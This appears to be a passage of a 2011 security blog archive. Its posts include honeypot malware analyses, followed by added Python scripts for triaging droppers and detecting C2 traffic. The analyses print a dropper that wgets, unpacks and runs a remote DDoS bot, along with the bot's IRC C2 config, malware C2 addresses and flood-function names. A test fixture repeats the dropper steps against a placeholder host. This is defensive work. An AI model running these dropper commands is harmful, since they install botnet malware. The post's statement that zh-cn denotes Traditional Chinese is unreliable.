1.4.5 Introducing Caffeine Security Secure Firefox! (2011-12-11 12:49)

I'm proud to announce I have completed my Secure Firefox add-on. Make your Firefox browser more secure! This add-on uses Defense Information Systems Agency (DISA) guidelines to harden your browser against attackers. For maximum security, combine this add-on with other security related add-ons such as NoScript! [1]Download Now!
1. https://addons.mozilla.org/en-US/firefox/addon/secure-firefox/

1.4.6 Mystery Malware: An echo powered DDoS Script? (2011-12-12 19:33)

Christmas came early today, and a hacker dropped off a present... a piece of mystery malware. This piece of malware was dropped onto my Linux honeypot, simply named DDoser. The file has a [1]0 % detection rate. Interesting. This appears to simply be a Linux/UNIX shell script. It starts with the following line repeated multiple times:

echo 2e61e112030709378914f8280fd09f62e61e112030709378914f8280fd09f62e61e112030709378914f8280fd09f62e61e112030709378914f8280fd09f62e61e112030709378914f8280fd09f6

And ends with the following lines:

clear
echo
echo **********************************************
echo The Installation Of D3v1Lz T34m Ddoser
echo Should Be Running Now On D3v1Lz Ircds
echo
echo Make Sure That Ddoser Is Running - Use This Command:
echo ps x
echo
echo If You See addict Listed, Then Its Running.
echo You Can Then Fuck Ips Randomly On Your Botnets.
echo **********************************************
echo
echo Enjoy Our Best Services At WebShells Co. , For More
echo Info Contact Us On Tech@WShells.Ws Or Call Us On 03-50 12 10
echo More Info About Script: Chadi@WShells.Ws
exit 0

An echo powered DDoS script? That doesn't make sense... A closer inspection reveals the true nature of this file... After repeating the garbage echo line multiple times, the following code executes:

#!/bin/sh
clear
wget http://d3v1lz.at.ua/DvLz-T34m.tar.gz
tar -zxvf DvLz-T34m.tar.gz
rm -rf DvLz-T34m.tar.gz
killall -9 addict
mv DvLz-T34m .dt
chmod +x .dt
cd .dt
chmod +x *
./start.sh
clear
cd
rm -rf DvLz-T34m

The file DvLz-T34m.tar.gz has a [2]37 % detection rate through generic detections... This script downloads and installs an apparent DDoS trojan which reports to an IRC command and control server. The archive's mech.set is the settings file format used by the EnergyMech IRC bot, and it names the nick, channel and server the bot reports to:

File mech.set:

NICK DvLz
USERFILE user
CMDCHAR .
LOGIN DvLz
IRCNAME D3v1Lz T34m Dd0ser
MODES +ixws
TOG CC 1
TOG CLOAK 1
TOG SPY 1
SET OPMODES 4
SET BANMODES 6
SET AAWAY 1
TOG NOIDLE 1
CHANNEL #Ddos
TOG PUB 1
TOG MASS 1
TOG SHIT 1
TOG PROT 1
TOG ENFM 1
SET ENFM +nstm
SET MDL 4
SET MKL 4
SET MBL 4
SET MPL 1
server slain.wshells.ws 6667

So why did the hacker use this script to install the malware, instead of simply downloading the malware directly and installing it him/herself? One possibility is to avoid automated analysis by honeypots. By uploading a script to the honeypot instead of the malware itself, any antivirus scan of the uploaded file would have nothing to match on: the script contains no malicious code of its own, only a download step, and the payload it fetches can be swapped on the remote host at any time. Furthermore, by burying the script within multiple garbage echo lines, it has a chance of evading both automated and manual analysis. The practical lesson for honeypot operators is that the download URL and the IRC server in the configuration are the indicators worth capturing, more than the dropper itself. With that said, both files have been submitted to AV vendors for analysis and inclusion in their detection signatures. To the hacker who uploaded this malware to my honeypot... thanks for the early Christmas present! I'm sorry to say all you're getting is a lump of coal. And a letter to your ISP.

1. http://www.virustotal.com/file-scan/report.html?id=cd37a0f3d1cef10474adf2c344e3c388cfd431664b521073c6903b51635f01ee-1323730198
2. http://www.virustotal.com/file-scan/report.html?id=7de7bb44b248914a3c6b16f6ab3956a552fec2da434dfaad07a3cef4149371ab-1323734691
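The analysis above was done by reading past the padding by hand. The script below is an added example, not code from the original post, that automates that first triage step for a dropper of this shape: it discards the decoy hex echo lines, keeps the commands that actually fetch, unpack, hide and launch something, pulls the download URLs out as indicators, and reads the nick, channel and server lines from a mech.set style bot configuration. SAMPLE_DROPPER and SAMPLE_MECH_SET are constructed stand-ins that follow the layout of the files above; the host names in them are placeholders, not the real ones.

```python
"""Triage of an 'echo padded' shell dropper and its IRC bot configuration.

Added example, not code from the original post. Separates decoy `echo <hex>`
padding from the commands that run, extracts download URLs as indicators,
and parses the C2-relevant lines of an EnergyMech-style mech.set file.
The sample texts are constructed; host names are placeholders.
"""
import re
import shlex

# A padding line is "echo" followed by nothing but a long run of hex digits.
HEX_ECHO_RE = re.compile(r"^\s*echo\s+[0-9a-fA-F]{16,}\s*$")
URL_RE = re.compile(r"https?://[^\s'\"]+")
# Commands that fetch, unpack, hide or launch something: the dropper's real work.
INTERESTING = {"wget", "curl", "tar", "mv", "chmod", "killall", "rm"}

SAMPLE_DROPPER = """\
echo 2e61e112030709378914f8280fd09f62e61e112030709378914f8280fd09f6
echo 2e61e112030709378914f8280fd09f62e61e112030709378914f8280fd09f6
#!/bin/sh
clear
wget http://dropper.example/payload.tar.gz
tar -zxvf payload.tar.gz
rm -rf payload.tar.gz
killall -9 addict
mv payload .dt
cd .dt
chmod +x *
./start.sh
echo 2e61e112030709378914f8280fd09f62e61e112030709378914f8280fd09f6
echo The Installation Should Be Running Now
exit 0
"""

SAMPLE_MECH_SET = """\
NICK DvLz
CHANNEL #Ddos
server irc.c2.example 6667
"""


def strip_echo_padding(script_text):
    """Return the script's lines minus decoy hex echoes and blank lines."""
    return [line.rstrip() for line in script_text.splitlines()
            if line.strip() and not HEX_ECHO_RE.match(line)]


def extract_urls(lines):
    """Every URL mentioned in the surviving lines, deduplicated and sorted."""
    return sorted({u for line in lines for u in URL_RE.findall(line)})


def commands_of_interest(lines):
    """Lines whose first word is a fetch/unpack/hide/launch command or a ./ launcher."""
    hits = []
    for line in lines:
        try:
            argv = shlex.split(line, comments=True)  # '#!/bin/sh' parses as a comment
        except ValueError:  # unbalanced quotes; fall back to a plain split
            argv = line.split()
        if argv and (argv[0] in INTERESTING or argv[0].startswith("./")):
            hits.append(line.strip())
    return hits


def parse_mech_set(text):
    """Pull nick, channels and servers out of a mech.set file.

    Assumption: one directive per line, keyword first, case-insensitive.
    """
    cfg = {"servers": [], "channels": [], "nick": None}
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        key = parts[0].upper()
        if key == "SERVER" and len(parts) >= 3 and parts[2].isdigit():
            cfg["servers"].append((parts[1], int(parts[2])))
        elif key == "CHANNEL" and len(parts) >= 2:
            cfg["channels"].append(parts[1])
        elif key == "NICK" and len(parts) >= 2:
            cfg["nick"] = parts[1]
    return cfg


def triage(script_text, mech_set_text=None):
    """One-shot summary: real commands, download URLs, and C2 details if a mech.set is given."""
    lines = strip_echo_padding(script_text)
    return {
        "commands": commands_of_interest(lines),
        "urls": extract_urls(lines),
        "c2": parse_mech_set(mech_set_text) if mech_set_text else None,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_DROPPER, SAMPLE_MECH_SET).items():
        print(key, value)
```

Pass the dropped file's text and, after unpacking the archive in an isolated VM, the mech.set text. The hex-echo rule is deliberately narrow; if a dropper pads with something else, widen HEX_ECHO_RE rather than loosen commands_of_interest, so the command list stays trustworthy.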
1.4.7 Free Subscription to Security Magazine (2011-12-12 20:02)

[1] I'm happy to provide my blog readers a chance to get a free subscription to the print or digital versions of Security magazine, which focuses on ways to apply technology and services to solve security problems. Security magazine reaches 35,000 security end-user and integrator subscribers in government, healthcare, education, airports, seaports, transportation, distribution, utilities, retail, industrial, financial, hospitality/entertainment, construction, industrial/manufacturing and other markets. [2]Sign up today!
1. http://4.bp.blogspot.com/-opPNsJHFquc/Tuaju7OIRFI/AAAAAAAAAHc/JQRv5WdoiEE/s1600/secc.gif 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=oc&_t=oc:&pc=sec

1.4.8 Iran, a Lost Drone, and a Computer Virus - Lessons to be Learned (2011-12-13 19:57)

Did a computer virus infection result in Iran acquiring a United States recon drone? In October, the major news outlets announced that the piloting systems used by unmanned recon drones in Afghanistan and other nearby countries were [1]compromised by a virus capable of recording keystrokes or user authentication information. The Air Force followed up with a press release that this virus was only a credential stealer, that it [2]was not designed to transmit or corrupt data, that the systems were completely [3]disconnected from the internet, and that the malware was introduced through removable media.

The following article is speculation. Its purpose is to highlight important security practices by illustrating possible links between the captured drone and a virus infection which occurred two months prior to the drone's capture. The author has no knowledge beyond what has been officially published.

I'd like to throw up a red flag here. Credential stealers are traditionally programmed with a "call home" feature to transmit the stolen credentials to their creator. Why would a credential stealer steal credentials and then only store them locally? Flash forward to the events of the past week, in which a United States stealth drone was [4]captured intact by Iran. Iran even claims they were able to [5]control the drone remotely. This is somewhat disturbing, since the drone [6]does not require an outside signal to fly or navigate. Based upon the available information, there are multiple possibilities linking the October virus infection with the drone lost two months later...

- The virus was not a credential stealer at all, and its true purpose was to alter the flight path of specific drones, similar to how Stuxnet only targeted industrial control systems capable of operating centrifuges.
- The virus was a credential stealer, and stored credentials locally to be retrieved later. Although the infected systems were not the piloting systems, it is likely the pilots used the same login credentials on the piloting systems. This is a disturbing possibility, as it would mean that a member of the military, or a military contractor, engaged directly in espionage by retrieving them.
- The virus was an intentional distraction, designed to shift the IT staff's focus from monitoring the security of the drones to the local systems, while another attack was performed covertly against the drones themselves.
- And finally, the virus infection could have been completely unrelated, and simply a coincidence.

Like all security breaches, this incident should be viewed as a learning opportunity. So what lessons can be learned from this incident?

- Treat all removable media such as USB drives with suspicion, even your own. Perform a low-level format after use, and always scan the drive for viruses before and after use. Examine the drive manually for any unexpected files, making sure to view hidden and protected operating system files.
- Always be aware of the possibility of an insider threat. Look for the warning signs.
- Implement application whitelisting on sensitive systems, and only disable the whitelist while performing regular security updates.
- Don't always believe your first analysis of a piece of unknown malware. It may have hidden features designed to evade detection. Stuxnet is an excellent example.
- Don't let your investigation of an ongoing security incident result in less monitoring for the rest of your network. Bring in outside help to handle the extra workload if you need to.
- Finally, as a colleague once told me, correlation does not mean causation. It is very possible that two similar incidents are completely unrelated, despite their close proximity to each other.

Hopefully the Air Force, and the rest of the Department of Defense, will also take the time to learn from this, and prevent a similar incident from happening in the future. As for the original question, did a virus infection result in Iran acquiring a United States drone? We may find out the full story eventually, but it may take [7]25 years.

Related Reading: [8]Data Security and Privacy: A Holistic Approach - A guide to securing sensitive data, online or offline [9]Operation Cleanup - A guide to removing malware infections
1. http://www.pcmag.com/article2/0,2817,2394374,00.asp 2. http://www.pcmag.com/article2/0,2817,2394634,00.asp 3. http://www.afspc.af.mil/news1/story.asp?id=123275647 4. http://abcnews.go.com/Blotter/obama-asks-iran-rq-170-sentinel-drone-back/story?id=15140133 5. http://www.cnn.com/2011/12/13/world/meast/iran-spy-plane/?hpt=hp_t2 6. http://www.businessinsider.com/iran-drone-virus-creech-air-force-base-2011-12 7. http://en.wikipedia.org/wiki/Declassification#Automatic_declassification 8. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=oc&_t=oc:&pc=w_ibmc239 9. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=oc&_t=oc:&pc=w_make40

1.4.9

Holiday Computer Essentials CD (2011-12-15 19:37)

The holidays are here again. A wonderful time to eat too much, exchange presents, and secure your family's computer systems. Each year IT professionals travel to relatives' houses, and are called upon as free tech support to remove the latest virus infections.


It helps if you have a CD-R burned and ready to go, so that you can properly clean and secure your family's computer systems. So what should you include on your holiday disaster recovery CD? Fortunately you can assemble such a CD at no cost to you.

Note: These numbers assume you are using a 700 MB CD-R.

Anti-virus

The first item you'll need is a good Anti-Virus program. My recommendation is to download the offline installer for AVG.

[1]AVG Free direct download

This will take up 153 MB (32-bit version) and 172 MB (64-bit version) of space, for a total of 326 MB. When fixing your family member's infected PC, this will be the first piece of software you'll want to install. Also grab the latest virus definitions, 70 MB. This comes to a total of 396 MB. You have 304 MB left on your disk.

Anti-Spyware

Next up is [2]Spybot Search and Destroy, for Anti-Spyware. Make sure to download the full installation (15.6 MB) as well as the latest detection updates (7 MB), for a total of 23 MB. You now have 281 MB left on your disk.

Firewall

Finally, let's download a firewall to help prevent infection. My favorite is ZoneAlarm. This free firewall is very powerful, and will stop most malware from communicating, as well as prevent external attacks.

[3]Download ZoneAlarm Free Firewall Now!

This download is only 5 MB. The catch is, you'll need internet access to install. Fortunately you've already cleaned up the infected computer, and you're ready to add a final layer of security. You now have 276 MB left on your disk.

How you use the rest is up to you. I would recommend perhaps a few educational ebooks/whitepapers to help raise your family's security awareness. A couple of suggested titles:

[4]The (VERY) Unofficial Guide To Facebook Privacy
[5]PC Security Handbook - 2nd Edition

1. http://www.jdoqocy.com/kd116kjspjr6CCB9CBB687EE7EBF
2. http://www.safer-networking.org/en/download/index.html
3. http://www.dpbolvw.net/h577biroiq5BBA8BAA576ADEF7A
4. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=oc&_t=oc:&pc=w_make16
5. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=oc&_t=oc:&pc=w_winb04

1.4.10

Insider Threats and Data Loss Prevention (2011-12-16 19:37)

[1]

One of the biggest challenges many organizations face is how to deal with the insider threat. A common means of attempting to control insider threats is through Data Loss Prevention software. Unfortunately, there is no one clearly superior method for implementing Data Loss Prevention. I'm happy to offer to my readers a free research report on different Data Loss Prevention techniques from the Aberdeen Group.

[2]

The ideal approach to security and compliance is like the ideal referee: one that makes good calls and enforces the rules regarding safety and fair play, but generally doesn't get in the way of the people playing the game. In its fifth annual study on best practices in data loss prevention (DLP), Aberdeen analyzed and compared the results from more than 600 organizations which have adopted one of four distinct approaches to the operational use of DLP technologies. The best approach, in terms of balancing enterprise risk and reward, is like the children's fairy tale of Goldilocks and the Three Bears: the bed we choose to lie in should be neither too soft (Do Nothing, Monitor / Notify), nor too hard (Stop / Go), but just right (Adapt / Protect).

[3]Access Your Complimentary Copy Today. This $399 Value Offer Expires 01/09/2012

1. http://3.bp.blogspot.com/-puxbYze_Tjo/TuvkpXIppyI/AAAAAAAAAHw/lCnX8WEYwG8/s1600/w_abeb325.gif
2. http://4.bp.blogspot.com/-xwK6pMvMj5k/TuvkLKCivWI/AAAAAAAAAHo/F2xrrzO-9p8/s1600/w_abeb325c.gif
3. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=oc&_t=oc:&pc=w_abeb325

1.4.11

New Resource: Threat Watch (2011-12-19 18:12)

The bad guys never sleep. I'm happy to announce that now even when I'm sleeping, my blog will be able to bring up-to-date news alerts relevant to computer security. Check out the [1]Threat Watch page today!
1. http://caffeinesecurity.blogspot.com/p/threat-watch.html

1.4.12

Linux/Bckdr-RKC Initial Analysis (2011-12-21 23:32)

A malicious user dropped off a VERY interesting piece of malware on my honeypot today with the filename .xsyslog. This piece of malware was previously undetected, and many kudos to [1]Sophos for being the first to confirm my findings that the software was malicious. So far, I have been able to determine the following:

- This is a UPX packed Linux ELF which appears to have been around since late November 2011, according to internet searches.
- The malware is installed from a compromised system after cracking an SSH server's root password, in the path /etc/.xsyslog
- The malware is downloaded from an IP address which appears to be hosted in Hong Kong by a fake corporation: 216.83.44.229 port 99
- It phones home to an IP address which appears to be hosted by the same fake corporation: 216.83.44.226 port 81

I have uploaded all relevant strings within the unpacked file to [2]Pastebin. I will provide additional details as I find/receive them. This malware has been forwarded to US-CERT, as well as multiple anti-virus vendors. Track current AV coverage at [3]http://md5.virscan.org/58c23ca549c941f0d44b35fa31d77011

Related Reading: Sophos Whitepaper [4]Protection for Mac and Linux Computers: Genuine Need or Nice to Have?

1. http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Linux%7EBckdr-RKC/detailed-analysis.aspx
2. http://pastebin.com/RZAnDnkz
3. http://md5.virscan.org/58c23ca549c941f0d44b35fa31d77011
4. http://caffinesecurity-blogspot.tradepub.com/free/w_aaaa1364/?p=w_aaaa1364
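A host-side check for the indicators this post gives, added here as an example (it is not the blog author's code, nor anything from Sophos or US-CERT). It looks for a hidden ELF with the UPX tag under a directory standing in for /etc, and matches the remote endpoints in a /proc/net/tcp dump against the two addresses quoted above. The planted file, the file names and the /proc/net/tcp rows are constructed for the demo; the `UPX!` marker is the tag the UPX packer leaves in packed binaries.

```python
"""Host-side checks for the indicators described in the post above.

Added example (not the blog author's code). It uses only the indicators the
post gives: a hidden UPX-packed ELF at /etc/.xsyslog, a download source of
216.83.44.229:99 and a phone-home address of 216.83.44.226:81. The sample
files and the /proc/net/tcp excerpt below are constructed for the demo.
"""
import os
import tempfile

ELF_MAGIC = b"\x7fELF"
UPX_MARKER = b"UPX!"          # tag the UPX packer leaves in the packed file
# (ip, port) pairs quoted in the post
C2_INDICATORS = {("216.83.44.229", 99), ("216.83.44.226", 81)}


def find_hidden_elf(dirpath):
    """Return [(name, is_upx)] for dot-files in dirpath that start with the ELF magic.

    A hidden *executable* under /etc is unusual on its own; UPX packing on top
    of that matches the sample described in the post.
    """
    hits = []
    for name in os.listdir(dirpath):
        path = os.path.join(dirpath, name)
        if not name.startswith(".") or not os.path.isfile(path):
            continue
        with open(path, "rb") as fh:
            head = fh.read(4096)
        if head[:4] == ELF_MAGIC:
            hits.append((name, UPX_MARKER in head))
    return sorted(hits)


def _hex_to_ipv4(hexip):
    # /proc/net/tcp stores IPv4 addresses as little-endian hex: "E22C53D8" -> 216.83.44.226
    return ".".join(str(int(hexip[i:i + 2], 16)) for i in (6, 4, 2, 0))


def parse_proc_net_tcp(text):
    """Return (remote_ip, remote_port) for every row of a /proc/net/tcp dump."""
    conns = []
    for line in text.splitlines()[1:]:          # first line is the column header
        fields = line.split()
        if len(fields) < 4:
            continue
        rem_ip, rem_port = fields[2].split(":")
        conns.append((_hex_to_ipv4(rem_ip), int(rem_port, 16)))
    return conns


def match_c2(conns):
    """Sorted list of connections whose remote endpoint is one of the quoted indicators."""
    return sorted(set(conns) & C2_INDICATORS)


# Constructed sample: header row, an SSH listener (remote 0.0.0.0:0) and an
# established session from 10.0.2.15 to 216.83.44.226:81 (hex E22C53D8:0051).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0F02000A:9C4E E22C53D8:0051 01 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 20 4 30 10 -1
"""


def demo_scan():
    """Build a throwaway directory that mimics /etc with the planted file, then scan it."""
    with tempfile.TemporaryDirectory() as etc:
        # constructed stand-in for the packed backdoor: ELF magic, padding, UPX tag
        with open(os.path.join(etc, ".xsyslog"), "wb") as fh:
            fh.write(ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 100 + UPX_MARKER + b"\x00" * 64)
        with open(os.path.join(etc, ".bashrc"), "w") as fh:   # hidden, but not an ELF
            fh.write("export PS1='$ '\n")
        with open(os.path.join(etc, "hostname"), "w") as fh:  # not hidden
            fh.write("honeypot\n")
        return find_hidden_elf(etc)


if __name__ == "__main__":
    print("hidden ELF files:", demo_scan())
    print("C2 connections:", match_c2(parse_proc_net_tcp(SAMPLE_PROC_NET_TCP)))
```

On a real host, point `find_hidden_elf` at /etc and feed `parse_proc_net_tcp` the contents of /proc/net/tcp; a hit on either check is a reason to pull the box for the kind of string and packer analysis the post describes, not proof by itself.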

1.4.13

Protect Your Family While Using Social Media (2011-12-22 19:57)

Cyberbullying and sexual predators are an ever increasing threat online, especially with social media sites like Facebook. See how to protect your children with this great informational video! [EMBED] [1]Protect your child from cyberbullies and strangers with ZoneAlarm SocialGuard

1. http://www.tkqlhce.com/8g104js0ys-FLLKILKKFHGOPHGNJ

1.4.14

Linux/Bckdr-RKC: A New Variant Appears (2011-12-26 10:18)

Someone was busy this Christmas. A new variant of Linux/Bckdr-RKC has been placed on my honeypot. Unfortunately detections by Sophos do not detect this variant, so I've sent it back to them for analysis. I have posted the [1]strings from the unpacked malware, as well as a [2]diff between the strings of the old version and new version. I will post updates as I can.

1. http://pastebin.com/0hqYbT8m
2. http://pastebin.com/ePdRxsT4

1.4.15

Woman Gives Birth to Three Plates (2011-12-27 12:59)

Just saw this email in the funsec mailing list:

Hello, My name is Mrs Yetunde Owolabi from Republic of Benin, I gave birth to three plates, 3 children at a time after the death my husband on 18th of June 2011 by auto car accident. Already we have received 5 children from God, right now I can't take care of them so I have decided to give them out for adoption, if you are interested let me know, I am not selling them but you will only pay for adoption fees to the ministry in concern and the Lawyer will legalized all the relevant documents and the baby will become legally yours. Thanks, Mrs. Yetunde Owolabi

You read that right. She gave birth to 3 plates. I really wish I had her email address, as I would be very impressed if she could provide some pictures of these plates.

1.4.16

How to Get a Cyber Security or Information Assurance Job (2011-12-27 19:37)

So, you've decided you want to start working in the security field? Where do you start? First, develop a plan and some career goals. Do you want to just be a tech all your life, or do you want to eventually become a manager? What interests you? Do you want to know how to protect networks and computers, or do you want to analyze malware and perform penetration testing? There are many paths available to you. This is a brief guide on what to do and how to get the job you want. Realize that Rome wasn't built in a day, and that your dream job isn't going to happen overnight. Computer security is truly a thankless job. You will constantly be harassed and insulted by non-security folks for making their lives more difficult. After all, no one would ever guess that their password is their middle name, right? Why are you making them include numbers AND special characters? Do you know how hard that is to remember? If you haven't been scared away yet, let's look at how to get started.

Get a Degree

It really helps to have a college degree. But it doesn't have to be in Information Assurance or Cyber Security! Other degrees which are useful:

- Computer Science
- Computer Engineering
- Information Technology
- (insert other wide-spectrum computer degree here)

You can start with just an Associate's degree, or go for your Bachelor's. A Bachelor's degree will qualify you for more jobs and earn higher pay, but will cost more time and money. Note that you *can* substitute experience for a degree in some cases, but unfortunately this is rather difficult to do unless you're already well established within your field (and you wouldn't need to be reading this guide anyway).

Get a Haircut, and Get a Real Job

Now it's time to get a tech job. For starters, this doesn't have to be security related, because technically all tech jobs are security related. For example, I started off as a software tester. One of the functions of my job, besides making sure the software worked, was to make sure the software was secure. However, be warned that the job you get may help to define your entire career path. A few examples:

- System Administrator, Software Tester, or IT Help Desk: most likely career path will transition to security compliance and analysis technical staff and management
- Web Developer, Software Developer, or Database Developer: most likely career path will transition to malware analysis technical staff and management

- Any of the above positions could possibly transition to penetration testing or computer forensics technical staff and management

It's not impossible to change career paths mid-stream, but it's not going to be easy. Here are some relevant [1]resume and interview tips.

Get Certified!

It's very important to become certified in your field of expertise if you want to advance your career. Some positions, especially Government contracting positions, will require certifications within 6 months of obtaining the position. If you're interested in the specific requirements for Government contracting, take a look at the [2]DoD 8570.01-M Information Assurance Workforce Improvement Program.

Security+ Certification

A good starter is the CompTIA Security+ certification. This certification shows employers that you have a basic understanding of important security concepts. The 90 minute exam is designed to be taken by someone with two years' basic computing and networking experience. But don't be fooled, it can be tricky. Here are two study guides which can help:

- [3]SY0-201 CompTIA Security+ Practice Exam and Study Guide
- [4]SY0-301 CompTIA Security+ Practice Exams

If your networking skills are a little lacking, this guide may also help:

- [5]Quick and Dirty Subnetting

Cisco CCNP Certification

If networking is one of your stronger skills, you should also consider obtaining a Cisco Certified Network Professional certification. This certification shows employers that you have in-depth knowledge for configuring and maintaining network equipment such as switches and routers. Here is a Cisco CCNP Practice Exam to help you out:

- [6]Cisco CCNP 642-813 (SWITCH) Practice Exam

CISSP Certification

The CISSP certification is considered the best certification for Cyber Security or Information Assurance professionals to obtain. This difficult exam is best described as a mile wide and an inch deep, covering a broad range of topics without becoming too technical. While this certification is aimed at management types, it's definitely useful for techs as well. Once again, here is a practice exam for your use:

- [7]ISC2 CISSP Practice Exam

Conclusion

I hope this quick guide has been useful. If you have any pointers or questions, please feel free to add comments below!

1. http://caffinesecurity-blogspot.tradepub.com/category/career-professional-development-interviews/590/
2. http://www.dtic.mil/whs/directives/corres/pdf/857001m.pdf
3. http://caffinesecurity-blogspot.tradepub.com/free/w_exam03/?p=w_exam03
4. http://caffinesecurity-blogspot.tradepub.com/free/w_exam18/?p=w_exam18
5. http://caffinesecurity-blogspot.tradepub.com/free/w_prep07/?p=w_prep07
6. http://caffinesecurity-blogspot.tradepub.com/free-offer/cisco-ccnp-642-813-switch-special-edition-practice-exams/w_exam15?sr=hicat&_t=hicat:587
7. http://caffinesecurity-blogspot.tradepub.com/free-offer/isc2-cissp/w_exam12?sr=hicat&_t=hicat:587

1.4.17

Anonymous: Friend or Foe? (2011-12-27 22:59)

[EMBED]

Is Anonymous a force for good, or just another threat online? This video has been posted in response to the [1]Stratfor hacking incident.

1. http://www.identityfinder.com/blog/post/Identity-Finder-Releases-Detailed-Analysis-of-Personal-Information-e28098Anonymouse28099-Attack-on-Stratfor.aspx

1.4.18

Protect Insider Data By Googling First, Often (2011-12-28 10:39)

Dark Reading has an excellent article called [1]Protect Insider Data By Googling First, Often. The summary of the article states:

Sensitive company data is often leaked via Google, Bing, and other search engines; find it before the bad guys can

Sound advice, and an excellent example of why it's important to set up [2]Google Alerts to monitor for privacy breaches, as I described in a [3]previous post.

1. http://www.darkreading.com/insider-threat/167801100/security/security-management/232301074/protect-insider-data-by-googling-first-often.html
2. http://caffeinesecurity.blogspot.com/2011/12/misuse-of-your-personal-information-and.html
3. http://caffeinesecurity.blogspot.com/2011/12/misuse-of-your-personal-information-and.html

1.4.19

Chinese Origins in .ssyslog Decompiled - Linux/Bckdr-RKC and Hutizu (2011-12-30 22:33)

I have partially decompiled the second piece of malware, which was similar to the original Linux/Bckdr-RKC dropped on my honeypot. Update: .ssyslog is now detected as Hutizu. I am [1]publicly posting the first section of this file to highlight my findings so far... Update: The full decompiled source of both pieces of malware is now available at [2]Google Code

The first part of this decompiled code which really stood out was a clear marker that this malware is definitely of Chinese origin. This snippet of code is from the following function:

int autoupdate(char* url_address, char* local_to_file)

Code:

L0805FF50(&v3660, "GET / %s HTTP/1.1\nAccept: */*\nAccept-Language: zh-cn\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\nHost: %s: %d\nConnection: Close\n\n", &v2380);

The Accept-Language of zh-cn represents [3]Traditional Chinese as the desired web browser language. This means the malware in question was most likely programmed by a native speaker of Chinese. Add to this the fact that the malware is hosted by a fake corporation in China, and that the previous version of this malware also phoned home to the same fake corporation, and this all becomes very interesting. Here are a few other function names from this latest version:

copy_myself(const char* name)
autostart(const char* inser_to_file)
int SendSevMonitor()
int SendServerPack()
GetNetPackets(long long unsigned int* lNetOut, long long unsigned int* lPacketOut)
int moniter(char* host)
int udpflood(_Unknown_base* ThreadData)
int synflood(_Unknown_base* ThreadData)
int synbigpacket(_Unknown_base* ThreadData)
int ackflood(_Unknown_base* ThreadData)
int ackbigpacket(_Unknown_base* ThreadData)
GetStructureDnsPacket(char* QueryDomain, char* QueryData, int* nQueryData)
int dnsflood(_Unknown_base* ThreadData)
int more_ip_dns_test(_Unknown_base* ThreadData)
int autoupdate(char* url_address, char* local_to_file)
int get_online_ip(char* domain, char* return_ip)
int parse_dns_response(char* return_ip)
parse_dns_name(unsigned char* chunk, unsigned char* ptr, char* out, int* len)
send_dns_request(const char* dns_name)
connect_to_server()

Make no mistake, this malware is clearly designed to perform reconnaissance on internal networks and disrupt communications when instructed to do so by the command and control server. The malware has self-replication and automatic update capabilities. I find this malware very disturbing. What I find even more disturbing is the fact that since my submission of this malware to antivirus vendors, with the exception of Avira, who believes this file is clean, none of the antivirus vendors have completed their analysis. These two pieces of malware seem very professionally crafted with a clear purpose - to serve as a cyber weapon.

1. http://pastebin.com/Tenmhmnf
2. http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/ssyslog/
3. http://social.msdn.microsoft.com/Forums/en/netfxbcl/thread/4fe22069-6556-4ce5-a264-edb59d102c85
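The autoupdate() format string above is also a usable network signature: on a Linux server there is no legitimate reason for an outbound request to claim "MSIE 5.01 on Windows NT 5.0" with an Accept-Language of zh-cn, and the Host header names the download source from the first post (216.83.44.229:99). The following is an added example, not the blog author's code and not part of the malware, of how a proxy-log or IDS check could score a captured request against those fields. Both sample requests are constructed: the first is what the quoted format string produces for a file name of update.bin (an assumed value), the second is an ordinary package-manager fetch for contrast.

```python
"""Signature check for the autoupdate() request built by the decompiled code above.

Added example, not part of the blog post or the malware. It reconstructs the
request from the format string quoted in the post and shows how a proxy log or
IDS rule could flag it on a Linux host. The sample requests are constructed.
"""

# Header values taken from the decompiled format string in the post
RKC_USER_AGENT = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
RKC_ACCEPT_LANGUAGE = "zh-cn"
RKC_HOSTS = {"216.83.44.229:99"}       # download source from the earlier post


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers).

    Header names are lower-cased. The request line is tokenised from both ends
    so the odd "GET / %s HTTP/1.1" spacing in the format string still parses,
    and bare "\\n" line endings are accepted as well as "\\r\\n".
    """
    raw = raw.replace("\r\n", "\n")
    head = raw.split("\n\n", 1)[0]
    lines = head.split("\n")
    tokens = lines[0].split()
    method, version = tokens[0], tokens[-1]
    target = " ".join(tokens[1:-1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def rkc_beacon_score(raw):
    """Return the list of matched indicators; an empty list means no match."""
    method, _target, headers = parse_http_request(raw)
    matched = []
    if method == "GET" and headers.get("user-agent") == RKC_USER_AGENT:
        matched.append("user-agent")
    if headers.get("accept-language") == RKC_ACCEPT_LANGUAGE:
        matched.append("accept-language")
    # the format string writes "Host: %s: %d", i.e. a space before the port
    host = headers.get("host", "").replace(" ", "")
    if host in RKC_HOSTS:
        matched.append("host")
    if headers.get("connection", "").lower() == "close":
        matched.append("connection-close")
    return matched


def is_rkc_beacon(raw):
    """Require the UA and locale indicators plus the known host before calling it a hit."""
    hits = set(rkc_beacon_score(raw))
    return {"user-agent", "accept-language", "host"} <= hits


# Constructed: what the format string produces for url_address="update.bin"
# (assumed name) against 216.83.44.229 port 99.
SAMPLE_BEACON = (
    "GET / update.bin HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: zh-cn\r\n"
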